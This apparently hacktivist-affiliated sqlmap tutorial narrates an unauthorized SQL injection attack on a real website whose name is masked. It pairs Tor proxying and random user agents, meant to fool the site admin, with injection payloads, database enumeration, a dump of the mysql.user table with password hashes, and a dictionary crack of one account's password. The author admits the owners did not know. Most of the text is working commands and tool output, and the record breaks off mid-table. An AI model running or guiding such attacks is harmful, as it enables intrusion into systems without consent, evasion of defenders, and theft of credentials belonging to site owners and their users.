Sqlmap Tutorial -- by gh0st big shout out to my brothers at irc.anonops.li #antisec especially DaMau55, Theory, and Storm -> what up guys! WHO LOVES SQL INJECTION ? Okay here we go... Okay first of all what is sqlmap? Sqlmap is a script written in pyton that will save you so much time when it comes to sql injection attacks, with some amazing features. Since sqlmap is written in python it is a very portable application meaning that it will work on any operating system that supports Python. Which means that it will work in lamen terms on Windows and Linux and Unix based operating systems. Some of the featuers available are: 1) takeover options 2) bruteforcing -> for tables/columns 3) database fingerprinting 4) google dork search options 4) command execution 5) operating system shell option 6) Proxy options 7) Enumeration options 8) password cracking options 9) and so much more... First lets get a printout of the sqlmap.py -h (help) output: sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net Usage: python ./sqlmap.py [options] Options: --version show program's version number and exit -h, --help show this help message and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be specified to set the source to get target urls from. -d DIRECT Direct connection to the database -u URL, --url=URL Target url -l LOGFILE Parse targets from Burp or WebScarab proxy logs -m BULKFILE Scan multiple targets enlisted in a given textual file -r REQUESTFILE Load HTTP request from a file -g GOOGLEDORK Process Google dork results as target urls -c CONFIGFILE Load options from a configuration INI file Request: These options can be used to specify how to connect to the target url. --data=DATA Data string to be sent through POST --cookie=COOKIE HTTP Cookie header --cookie-urlencode URL Encode generated cookie injections --drop-set-cookie Ignore Set-Cookie header from response --user-agent=AGENT HTTP User-Agent header --random-agent Use randomly selected HTTP User-Agent header --referer=REFERER HTTP Referer header --headers=HEADERS Extra HTTP headers newline separated --auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM) --auth-cred=ACRED HTTP authentication credentials (name:password) --auth-cert=ACERT HTTP authentication certificate (key_file,cert_file) --proxy=PROXY Use a HTTP proxy to connect to the target url --proxy-cred=PCRED HTTP proxy authentication credentials (name:password) --ignore-proxy Ignore system default HTTP proxy --delay=DELAY Delay in seconds between each HTTP request --timeout=TIMEOUT Seconds to wait before timeout connection (default 30) --retries=RETRIES Retries when the connection timeouts (default 3) --scope=SCOPE Regexp to filter targets from provided proxy log --safe-url=SAFURL Url address to visit frequently during testing --safe-freq=SAFREQ Test requests between two visits to a given safe url Optimization: These options can be used to optimize the performance of sqlmap. -o Turn on all optimization switches --predict-output Predict common queries output --keep-alive Use persistent HTTP(s) connections --null-connection Retrieve page length without actual HTTP response body --threads=THREADS Max number of concurrent HTTP(s) requests (default 1) Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts. -p TESTPARAMETER Testable parameter(s) --dbms=DBMS Force back-end DBMS to this value --os=OS Force back-end DBMS operating system to this value --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string --tamper=TAMPER Use given script(s) for tampering injection data Detection: These options can be used to specify how to parse and compare page content from HTTP responses when using blind SQL injection technique. --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (0-3, default 1) --string=STRING String to match in page when the query is valid --regexp=REGEXP Regexp to match in page when the query is valid --text-only Compare pages based only on the textual content Techniques: These options can be used to tweak testing of specific SQL injection techniques. --technique=TECH SQL injection techniques to test for (default BEUST) --time-sec=TIMESEC Seconds to delay the DBMS response (default 5) --union-cols=UCOLS Range of columns to test for UNION query SQL injection --union-char=UCHAR Character to use for bruteforcing number of columns Fingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements. -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --is-dba Detect if the DBMS current user is DBA --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes --privileges Enumerate DBMS users privileges --roles Enumerate DBMS users roles --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries --search Search column(s), table(s) and/or database name(s) -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --first=FIRSTCHAR First query output word character to retrieve --last=LASTCHAR Last query output word character to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell Brute force: These options can be used to run brute force checks. --common-tables Check existence of common tables --common-columns Check existence of common columns User-defined function injection: These options can be used to create custom user-defined functions. --udf-inject Inject custom user-defined functions --shared-lib=SHLIB Local path of the shared library File system access: These options can be used to access the back-end database management system underlying file system. --file-read=RFILE Read a file from the back-end DBMS file system --file-write=WFILE Write a local file on the back-end DBMS file system --file-dest=DFILE Back-end DBMS absolute filepath to write to Operating system access: These options can be used to access the back-end database management system underlying operating system. --os-cmd=OSCMD Execute an operating system command --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an out-of-band shell, meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation --priv-esc Database process' user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed --tmp-path=TMPPATH Remote absolute path of temporary files directory Windows registry access: These options can be used to access the back-end database management system Windows registry. --reg-read Read a Windows registry key value --reg-add Write a Windows registry key value data --reg-del Delete a Windows registry key value --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key value --reg-data=REGDATA Windows registry key value data --reg-type=REGTYPE Windows registry key value type General: These options can be used to set some general working parameters. -s SESSIONFILE Save and resume all data retrieved on a session file -t TRAFFICFILE Log all HTTP traffic into a textual file --batch Never ask for user input, use the default behaviour --charset=CHARSET Force character encoding used for data retrieval --eta Display for each output the estimated time of arrival --flush-session Flush session file for current target --fresh-queries Ignores query results stored in session file --save Save options on a configuration INI file --update Update sqlmap Miscellaneous: --beep Alert when sql injection found --check-payload IDS detection testing of injection payloads --cleanup Clean up the DBMS by sqlmap specific UDF and tables --forms Parse and test forms on target url --gpage=GOOGLEPAGE Use Google dork results from specified page number --mobile Imitate smartphone through HTTP User-Agent header --page-rank Display page rank (PR) for Google dork results --parse-errors Parse DBMS error messages from response pages --replicate Replicate dumped data into a sqlite3 database --tor Use default Tor (Vidalia/Privoxy/Polipo) proxy address --wizard Simple wizard interface for beginner users So many options right? Sqlmap can even be tied in with metasploit which i will try to cover at another time, for now i am going to go over some of my favorite options and this is really just a quick start to get you familiar with sqlmap and how to start using it right away. Okay so what can we do with this great script? I will show you... First option that we will discuss is the proxy option (--proxy) sqlmap is able to connect to its target web server through a proxy, which is great when you are trying to hide your real ip address. Sqlmap even comes with the (--tor) option so that if you have tor running on your operating system you can just use the --tor option and it will find either polipo/privoxy and connect to your target through your proxy. I have written a very detailed tutorial on how to install/setup Tor on your linux system, if you have not read it i would suggest you check it out here: Tor Tutorial written by gh0st: http://pastebin.com/XhTx8n3b Okay lets continue... So for this tutorial the proxy that we will be using is Polipo from Tor. This is the syntax to have sqlmap connect to the target webserver through a proxy. root@bt# python sqlmap.py --proxy="http://127.0.0.1:8118" Okay now if you are not familiar with python scripts you need to add the word "python" infront of the script, (just like perl) or you can just use the ./ to run the script root@bt# ./sqlmap.py --proxy="http://127.0.0.1:8118" Here please notice that 127.0.0.1 = localhost which is where we are running Polipo and "8118" is the port that polipo is running on. We can verify this with the following linux command: root@bt:~# netstat -ntl Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:8118 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:7175 0.0.0.0:* LISTEN tcp6 0 0 ::1:7175 :::* LISTEN Okay so now we have Sqlmap connecting to our target webserver through a proxy, we have hidden our real ip address so we are safe. Another great option would be to trick the admin of the target webserver in thinking that our connections/probing from sqlmap to his webserver is just different people connecting to his website. I will explain... I know this will not be new information for some of you but for others this will be valuable information to them... Okay when you connect to a webserver lets say its http://www.abc.com if you have a security conscience admin and he reviews his web logs, when a person is just connecting to his website they are making a connection on Port 80. Port 80 is where a webserver such as apache is running.. So when he looks at his logs if he sees something like this... "Mozilla 5.0 (X11; U; Linux i686; en-US; rv 1.9.2.10) Gecko 2121120043 Firefox 3.6.10" that is what will show up in the logs with an ip address attached to it and its just a basic connection from a firefox web browser to a webserver. And when you browse through the site different things will show up in the log, like (GET, POST, ETC ETC) We can add trick the web admin into thinking that our probing and scanning from sqlmap could possibly be just a web browser browsing his website. Here is how we do this.. One of my favorite options on sqlmap.. --user-agent it will look like this: --user-agent="Mozilla 5.0 (X11; U; Linux i686; en-US; rv 1.9.2.10) Gecko 2121120043 Firefox 3.6.10" we can do this to make the admin think that our sqlmap probing his website is just a firefox web browser. But instead of typing all that information, we can just use the --random-agen option. --random-agent -> this will generate random agents for each connection made, and when we are using a proxy it will look like different browser agents from different ip addresses! How great is that! So lets put it all together now... root@bt# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent Okay so we are covered so far by hiding our ip address and now we have random agents being generated for each connection made to our target address. Feels good don't it? Now lets get to the fun stuff! Lets find a target! Before i disply the next steps know that sqlmap.py has the (-g) options which is for google dorks and sqlmap.py given the right syntax will access google to find you a target matching the syntax you provide. Okay we have a target lets get started... All we need to do to provide a target for sqlmap to attack is provide this syntax: root@bt# python sqlmap.py -u "target.com/news.php?id=11" so the syntax -> -u "targetsitegoeshere.com" now lets put it all together with our other options... root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 18:37:16 [18:37:16] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 [18:37:16] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file [18:37:17] [INFO] testing connection to the target url [18:37:21] [INFO] testing if the url is stable, wait a few seconds [18:37:22] [INFO] url is stable [18:37:22] [INFO] testing if GET parameter 'id' is dynamic [18:37:23] [INFO] confirming that GET parameter 'id' is dynamic [18:37:24] [INFO] GET parameter 'id' is dynamic [18:37:25] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL) [18:37:25] [INFO] testing sql injection on GET parameter 'id' [18:37:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [18:37:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [18:37:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [18:37:29] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [18:37:29] [INFO] testing 'MySQL > 5.0.11 stacked queries' [18:37:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [18:38:11] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [18:38:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [18:38:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 29 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 8517=8517 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=6 AND SLEEP(5) --- [18:44:56] [INFO] manual usage of GET payloads requires url encoding [18:44:56] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5.0 [18:44:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com' [*] shutting down at: 18:44:56 Okay now look above all we did was the following options broken down: --proxy="http://127.0.0.1:8118" -> Polipo/Tor Proxy --random-agent -> make it look like a web browser -u "target.com/info.php?id=6" -> target Okay so you know i am going to hide the real website that i used because i feel it just wouldn't be right to post this information especially without them knowing... This is the line you should take notice from above... GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N the site is vulnerable to sql injection... Do we want to try others? For this option you can almost always choose N because sqlmap has found what is injectable on the site and sqlmap has determined that the site is MySQL so if you were to choose yes on this option it would try other sql types and it is not neccesary here.. MOVING ON! Our current command line being used: root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" Next thing we are going to add to our command line is this option (--dbs) --dbs -> Enumerate DBMS databases -> DBMS = database management system This option (--dbs) will search our target website for available databases, how great is this! Here we go... root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --dbs sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 18:45:17 [18:45:17] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 [18:45:17] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file [18:45:17] [INFO] resuming injection data from session file [18:45:17] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [18:45:18] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 8517=8517 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=6 AND SLEEP(5) --- [18:45:19] [INFO] manual usage of GET payloads requires url encoding [18:45:19] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5.0 [18:45:19] [INFO] fetching database names [18:45:20] [INFO] the SQL query used returns 26 entries [18:45:20] [INFO] suppressing possible resume console info because of large number of rows (might take too much time) [18:45:21] [INFO] retrieved: testpiotr [18:45:22] [INFO] retrieved: test [18:45:22] [INFO] retrieved: sma [18:45:23] [INFO] retrieved: sale [18:45:24] [INFO] retrieved: rk2009 [18:45:25] [INFO] retrieved: rk [18:45:25] [INFO] retrieved: pathologistsmeetclinicians [18:45:26] [INFO] retrieved: ncp [18:45:27] [INFO] retrieved: mysql [18:45:28] [INFO] retrieved: mydb [18:45:29] [INFO] retrieved: lowers [18:45:29] [INFO] retrieved: limesurvey [18:45:30] [INFO] retrieved: lemon8xml [18:45:32] [INFO] retrieved: idaho_test_usun [18:45:33] [INFO] retrieved: ici_corporate [18:45:34] [INFO] retrieved: grants [18:45:35] [INFO] retrieved: fored2010 [18:45:36] [INFO] retrieved: egroupware [18:45:36] [INFO] retrieved: db_test [18:45:37] [INFO] retrieved: bugtracker [18:45:38] [INFO] retrieved: blogic [18:45:39] [INFO] retrieved: avea [18:45:40] [INFO] retrieved: IC2 [18:45:41] [INFO] retrieved: information_schema available databases [26]: [*] avea [*] blogic [*] bugtracker [*] db_test [*] egroupware [*] fored2010 [*] grants [*] IC2 [*] ici_corporate [*] idaho_test_usun [*] information_schema [*] lemon8xml [*] limesurvey [*] lowers [*] mydb [*] mysql [*] ncp [*] pathologistsmeetclinicians [*] rk [*] rk2009 [*] sale [*] sma [*] test [*] testpiotr [18:45:41] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com' [*] shutting down at: 18:45:41 WOW!!! Sqlmap has found 26 databases! A few of the databases have been removed to hide the identity of the website. Forgive me =-P Okay well what now? Next we need to do a little digging, and we need to find some good tables and columns so we can exploit this website. Lets start with the database [*] mydb We are going to see what is in the database (mydb) we are going to add these options to our command line: -D mydb -> this tells sqlmap to use the database mydb (-D) options is for databse --tables -> this tells sqlmap to search for tables in the (mydb) database NOTE: because the database [*]information_schema is available we are able to get databases/tables/columns right away. If for whatever reason this database was not available to us then sqlmap would use a bruteforce attack trying 30,000+ common table names to try and find other tables/columns and do note that this can take awile. MOVNIG ON! root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --tables -D mydb sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 18:46:51 [18:46:51] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322) [18:46:51] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file [18:46:51] [INFO] resuming injection data from session file [18:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [18:46:51] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 8517=8517 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=6 AND SLEEP(5) --- [18:46:52] [INFO] manual usage of GET payloads requires url encoding [18:46:52] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5.0 [18:46:52] [INFO] fetching tables for database: mydb [18:46:54] [INFO] the SQL query used returns 2 entries [18:46:54] [INFO] retrieved: mydb [18:46:55] [INFO] retrieved: WORKER [18:46:56] [INFO] retrieved: mydb [18:46:57] [INFO] retrieved: COMPANY Database: mydb [2 tables] +---------+ | COMPANY | | WORKER | +---------+ [18:46:57] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com' [*] shutting down at: 18:46:57 Okay as you can hopefully see that there is only 2 tables available to us on DATABASE mydb, and there is nothing sexy or usefull here so we will move on... NOTE: one thing i would like you to notice is that sqlmap.py logs all information and sessions to the following directory under backtrack linux: sqlmap logs output to directory -> /pentest/database/sqlmap/output/www.targetwebsite.com So you can find all information and recordings of everything in that directory, this is very important!! MOVING ON!! We need to pick another database to enumerate so i will try the database (mysql) root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --tables -D mysql sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 18:47:55 [18:47:55] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru) [18:47:55] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file [18:47:55] [INFO] resuming injection data from session file [18:47:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [18:47:55] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 8517=8517 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=6 AND SLEEP(5) --- [18:48:03] [INFO] manual usage of GET payloads requires url encoding [18:48:03] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5.0 [18:48:03] [INFO] fetching tables for database: mysql [18:48:04] [INFO] the SQL query used returns 18 entries [18:48:05] [INFO] retrieved: mysql [18:48:05] [INFO] retrieved: user_info [18:48:06] [INFO] retrieved: mysql [18:48:07] [INFO] retrieved: user [18:48:07] [INFO] retrieved: mysql [18:48:08] [INFO] retrieved: time_zone_transition_type [18:48:09] [INFO] retrieved: mysql [18:48:09] [INFO] retrieved: time_zone_transition [18:48:10] [INFO] retrieved: mysql [18:48:10] [INFO] retrieved: time_zone_name [18:48:11] [INFO] retrieved: mysql [18:48:12] [INFO] retrieved: time_zone_leap_second [18:48:12] [INFO] retrieved: mysql [18:48:13] [INFO] retrieved: time_zone [18:48:14] [INFO] retrieved: mysql [18:48:14] [INFO] retrieved: tables_priv [18:48:15] [INFO] retrieved: mysql [18:48:16] [INFO] retrieved: procs_priv [18:48:17] [INFO] retrieved: mysql [18:48:17] [INFO] retrieved: proc [18:48:18] [INFO] retrieved: mysql [18:48:19] [INFO] retrieved: host [18:48:19] [INFO] retrieved: mysql [18:48:20] [INFO] retrieved: help_topic [18:48:21] [INFO] retrieved: mysql [18:48:29] [INFO] retrieved: help_relation [18:48:30] [INFO] retrieved: mysql [18:48:31] [INFO] retrieved: help_keyword [18:48:31] [INFO] retrieved: mysql [18:48:32] [INFO] retrieved: help_category [18:48:33] [INFO] retrieved: mysql [18:48:33] [INFO] retrieved: func [18:48:34] [INFO] retrieved: mysql [18:48:35] [INFO] retrieved: db [18:48:35] [INFO] retrieved: mysql [18:48:36] [INFO] retrieved: columns_priv Database: mysql [18 tables] +---------------------------+ | columns_priv | | db | | func | | help_category | | help_keyword | | help_relation | | help_topic | | host | | proc | | procs_priv | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | | user_info | +---------------------------+ [18:48:36] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com' [*] shutting down at: 18:48:36 FINALLY!!!! We have found a usefull table now! While i would love to see and 'admin' table, the 'user' table does get me happy! Now that we have found a good table we need to find the columns in the table and maybe we can find some passwords as well! We are going to add the following options to our command line: -D mysql -> use database mysql -T user -> use table user_info --dump -> dump all the columns you find in table user Okay here is what our command line will look like now... root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" -D mysql -T user --dump sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 18:49:04 [18:49:04] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13 [18:49:05] [INFO] using '/pentest/database/sqlmap/output/www.indexcHIDEN.com/session' as session file [18:49:05] [INFO] resuming injection data from session file [18:49:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [18:49:05] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 8517=8517 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=6 AND SLEEP(5) --- [18:49:17] [INFO] manual usage of GET payloads requires url encoding [18:49:17] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5.0 [18:49:17] [INFO] fetching columns for table 'user' on database 'mysql' [18:49:18] [INFO] the SQL query used returns 37 entries [18:49:18] [INFO] suppressing possible resume console info because of large number of rows (might take too much time) [18:49:20] [INFO] retrieved: max_user_connections [18:49:22] [INFO] retrieved: int(11) unsigned [18:49:23] [INFO] retrieved: max_connections [18:49:24] [INFO] retrieved: int(11) unsigned [18:49:25] [INFO] retrieved: max_updates [18:49:27] [INFO] retrieved: int(11) unsigned [18:49:28] [INFO] retrieved: max_questions [18:49:30] [INFO] retrieved: int(11) unsigned [18:49:31] [INFO] retrieved: x509_subject [18:49:34] [INFO] retrieved: blob I HAVE REMOVED SOME OF INFORMATION TO KEEP THE TUTORIAL SIZE DOWN! [18:51:32] [INFO] retrieved: localhost [18:51:33] [INFO] retrieved: root [18:51:35] [INFO] retrieved: N [18:51:37] [INFO] retrieved: [18:51:38] [INFO] retrieved: *2F1FBE78A7A4C9CA6F239A4C12D2F6B16B [18:51:39] [INFO] retrieved: N [18:51:41] [INFO] retrieved: N [18:51:42] [INFO] retrieved: N [18:51:46] [INFO] retrieved: [18:51:47] [INFO] retrieved: [18:51:49] [INFO] retrieved: N [18:54:08] [INFO] retrieved: Y [18:54:09] [INFO] retrieved: localhost [18:54:11] [INFO] retrieved: [18:54:12] [INFO] retrieved: Y [18:54:14] [INFO] retrieved: [18:54:15] [INFO] retrieved: *605A60BF6EFC17C157CF1E34F576F35BFD80 [18:54:16] [INFO] retrieved: Y [18:57:28] [INFO] retrieved: projects [18:57:29] [INFO] retrieved: Y [18:57:31] [INFO] retrieved: [18:57:33] [INFO] retrieved: *B012E8731FF1DF44F3D8B26837708985278C [18:57:34] [INFO] retrieved: Y recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] [19:09:16] [INFO] using hash method: 'mysql_passwd' what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt] [19:10:00] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt' do you want to use common password suffixes? (slow!) [y/N] N [19:10:13] [INFO] starting dictionary attack (mysql_passwd) [19:10:13] [INFO] found: 'password' for hash: '*e56a114692fe0de073f9a1dd68a00eeb9703' [19:10:13] [INFO] found: 'password' for user: 'projects' Database: mysql Table: user [25 entries] +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+ | Alter_priv | Alter_routine_priv | Create_priv | Create_routine_priv | Create_tmp_table_priv | Create_user_priv | Create_view_priv | Delete_priv | Drop_priv | Execute_priv | File_priv | Grant_priv | Host | Index_priv | Insert_priv | Lock_tables_priv | max_connections | max_questions | max_updates | max_user_connections | Password | Process_priv | References_priv | Reload_priv | Repl_client_priv | Repl_slave_priv | Select_priv | Show_db_priv | Show_view_priv | Shutdown_priv | ssl_cipher | ssl_type | Super_priv | Update_priv | User | x509_issuer | x509_subject | +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+ | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *2F1FBE78A7A4C9CA6F239A4C12D2F6B16B8D5 | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | root | NULL | NULL | | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | 